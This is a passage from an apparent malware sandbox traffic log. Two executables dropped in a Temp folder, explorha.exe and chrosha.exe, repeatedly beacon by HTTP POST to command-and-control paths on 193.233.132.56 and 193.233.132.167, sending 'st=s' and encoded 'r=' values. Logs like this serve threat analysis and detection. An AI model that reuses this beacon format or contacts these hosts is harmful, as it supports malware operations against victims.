                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:20.961416006 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      106192.168.2.549939193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.324980974 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.572743893 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      107192.168.2.549940193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.558029890 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.809206009 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.810395956 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.064507961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      108192.168.2.549941193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:21.820354939 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.067542076 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      109192.168.2.549942193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.420603037 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.660533905 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.661830902 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.910242081 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      110192.168.2.549943193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.427755117 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.672481060 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      111192.168.2.549944193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:22.926250935 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.179841995 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      112192.168.2.549945193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.332365990 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.573992968 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.575232983 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.820990086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      113192.168.2.549946193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.588937998 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:23.837496042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      114192.168.2.549947193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.092719078 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.348177910 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      115192.168.2.549948193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.179438114 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.428349972 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.429516077 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.683850050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      116192.168.2.549949193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.712636948 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:24.960352898 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      117192.168.2.549951193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.032480955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.272588015 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.275438070 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:25.520054102 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


